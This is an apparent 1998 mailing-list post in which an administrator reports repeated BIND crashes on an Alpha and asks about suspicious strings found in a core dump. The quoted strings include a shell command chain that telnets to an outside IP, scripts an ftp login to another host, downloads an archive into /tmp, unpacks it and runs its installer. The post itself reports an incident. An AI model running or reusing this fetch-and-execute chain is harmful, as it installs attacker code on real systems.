Further to the BIND crashes reported recently ours went down again at
2300GMT Sunday and 0630 Monday morning. On using strings (we dont have a
licence for dbx non-kernel) on the relevant core dump we found the
following:
etc
im<29>May 17 23:50:04 named[7292]: Ready to answer queries.
Ready to answer queries.
;ech
61234^1
/bin/sh
telnet 194.100.53.150 666;cd /tmp;(echo open 128.2.189.110;echo ftp;echo
tnt_at_;echo get lib/hide hide;echo quit) | ftp;tar -zxf hi
de;cd ins;./ins;exit
smithbrewer
etc
This looks suspicious to me. What is such a string doing in the BIND
dump? Is it somebody trying to break in to a sytem using us as a
piggyback? We have nothing to do with either of these addresses. And is
this anything to do with the crash. We are still using 3.2c on an Alpha
1000.
Incidentally after the previous crash we set a cron job going to look for
BIND presence and restart if not found. This stopped me being called out
in the middle of Sunday night!!
Stuart McKenzie
Received on Mon May 18 1998 - 12:25:16 NZST